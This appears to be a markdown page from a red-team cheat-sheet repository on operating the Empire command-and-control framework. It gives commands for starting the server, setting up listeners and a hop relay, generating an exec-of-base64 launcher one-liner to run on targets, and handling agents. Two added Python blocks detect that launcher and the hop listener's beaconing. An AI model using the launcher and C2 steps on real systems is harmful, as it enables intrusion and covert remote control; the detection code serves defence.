killchain-compendium/post_exploitation/docs/empire.md
# Empire C2
* [Empire Repo](https://github.com/BC-SECURITY/Empire.git)
## Start Client and Server
```sh
poetry run python empire --server --rest --notifications
poetry run python empire.py client
```
## Parts
* __Listeners__ receive connections from stagers and agents
* __Stagers__ generated payloads (for example a launcher one-liner) that deliver an agent to the target
* __Agents__ run on the target device and carry out tasks
* __Modules__ modularized payloads run through agents
* __Credentials__ collected credentials
* __Report__ information on devices
* Results are stored in a DB
## Commands
### uselistener
* Example
```sh
uselistener http
```
* Metasploit-like commands: set options, review them, then start the listener
```sh
set <option> <value>
options
execute
```
* Go back to the main menu
```sh
back
main
```
* Check `listeners`
* `kill <listener>`
### usestager
```sh
usestager multi/launcher
usestager multi/bash
```
* Set the listener created under `uselistener`
```sh
set Listener <Listener>
```
* `execute`; the output is the launcher one-liner, for example:
```sh
echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));" | python3 &
```
* Run this launcher on the target to start an agent
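A detection-side example added here (it is not part of the compendium nor of Empire itself): a Python scan that looks for the launcher shape shown above in collected process command lines and decodes the embedded base64 blob so an analyst can preview what was staged. The record format, host names and the base64 payload are constructed for the example.

```python
import base64
import binascii
import re

# Regex for the launcher shape shown above: a semicolon-separated one-liner
# that imports base64 and exec()s a base64-decoded blob.
LAUNCHER_RE = re.compile(
    r"import\s+sys\s*,\s*base64\s*,\s*warnings\s*;"        # import list
    r".*?exec\s*\(\s*base64\.b64decode\s*\(\s*['\"]"       # exec(base64.b64decode('
    r"(?P<blob>[A-Za-z0-9+/=]+)['\"]\s*\)\s*\)",            # the blob itself
    re.DOTALL,
)


def decode_blob(blob):
    """Best-effort decode of the blob for an analyst preview; None if not valid base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def analyse_cmdline(cmdline):
    """Return a finding dict if the command line carries the launcher, else None."""
    m = LAUNCHER_RE.search(cmdline)
    if not m:
        return None
    blob = m.group("blob")
    return {
        "blob_length": len(blob),
        "decoded_preview": (decode_blob(blob) or "")[:200],
        # The launcher shown above is piped into python3; record whether this one is.
        "piped_to_python": bool(re.search(r"\|\s*python3?\b", cmdline)),
    }


def scan_process_records(records):
    """Run analyse_cmdline over records of the form {host, pid, cmdline}."""
    hits = []
    for rec in records:
        finding = analyse_cmdline(rec["cmdline"])
        if finding:
            finding["host"] = rec["host"]
            finding["pid"] = rec["pid"]
            hits.append(finding)
    return hits


# Constructed sample data: the blob is a harmless placeholder, not a real stager.
SAMPLE_BLOB = base64.b64encode(b"print('constructed placeholder')").decode()
SAMPLE_LAUNCHER = (
    'echo "import sys,base64,warnings;warnings.filterwarnings(\'ignore\');'
    'exec(base64.b64decode(\'' + SAMPLE_BLOB + '\'));" | python3 &'
)
SAMPLE_RECORDS = [
    {"host": "ws01", "pid": 4211, "cmdline": SAMPLE_LAUNCHER},
    # Benign base64 use: no warnings import, no exec(), must not be flagged.
    {"host": "ws01", "pid": 4300,
     "cmdline": 'python3 -c "import sys,base64;print(base64.b64encode(sys.argv[1].encode()))"'},
    {"host": "ws02", "pid": 17, "cmdline": "ls -la /tmp"},
]

if __name__ == "__main__":
    for hit in scan_process_records(SAMPLE_RECORDS):
        print(hit)
```

The pattern keys on the import list and the `exec(base64.b64decode(` call rather than on the blob, so it survives a changed payload; process command lines from auditd, EDR telemetry or shell history exports can be fed in the same dict shape.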
### agents
* `agents` checks the deployed agents
* `interact <AgentName>`
* `help` in interaction context
* `kill <AgentName>`
## Create Hop Listener
```sh
uselistener http_hop
```
```sh
set RedirectListener <ExistingListenerName>
```
```sh
set Host <IPofRelay>
set Port <PortonRelay>
```
* `execute` and check files under `/tmp/http_hop/news.php`, `/tmp/http_hop/admin/get.php`, `/tmp/http_hop/login/process.php`
* `usestager multi/handler`
* `set Listener http_hop`
* on Relay: `php -S 0.0.0.0:PORT &>/dev/null &`
* `usemodule powershell/privesc/sherlock` on an agent, for example
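Added example, not from the compendium or from Empire: a Python scan of web-server access logs for the three default hop paths named above (`/news.php`, `/admin/get.php`, `/login/process.php`) that also measures how regularly each client requests them. The log lines are constructed for the example; it assumes the relay, or a proxy in front of `php -S`, logs in the Apache/nginx combined format.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Default hop URIs from the section above (the files dropped under /tmp/http_hop/).
HOP_PATHS = {"/news.php", "/admin/get.php", "/login/process.php"}

# Combined log format as written by Apache or nginx (assumption for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (client_ip, timestamp, path) for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("target").split("?", 1)[0]   # drop any query string
    return m.group("ip"), ts, path


def summarize_hop_traffic(lines):
    """Group requests to the default hop paths per client and measure their cadence."""
    per_client = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path = parsed
        if path in HOP_PATHS:
            per_client[ip].append((ts, path))
    findings = []
    for ip, hits in per_client.items():
        hits.sort()
        # Seconds between consecutive requests; a steady median suggests beaconing.
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        findings.append({
            "client": ip,
            "count": len(hits),
            "paths": sorted({p for _, p in hits}),
            "median_interval_s": statistics.median(gaps) if gaps else None,
        })
    findings.sort(key=lambda f: f["count"], reverse=True)
    return findings


# Constructed sample log: one client polling every 5 s, one benign client, one bad line.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Aug/2021:01:13:54 +0200] "GET /admin/get.php HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Aug/2021:01:13:56 +0200] "GET /index.html HTTP/1.1" 200 88 "-" "curl/7.74.0"',
    '10.0.0.5 - - [23/Aug/2021:01:13:59 +0200] "GET /admin/get.php HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [23/Aug/2021:01:14:04 +0200] "POST /news.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [23/Aug/2021:01:14:09 +0200] "GET /admin/get.php?id=1 HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Aug/2021:01:15:00 +0200] "GET /news.php HTTP/1.1" 404 0 "-" "curl/7.74.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for finding in summarize_hop_traffic(SAMPLE_LOG):
        print(finding)
```

The three paths are only Empire's defaults and an operator can change the listener's communication profile, so the literal paths are a starting point; the per-client request cadence is the more durable signal and is worth alerting on even when the paths differ.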
### Interactive shell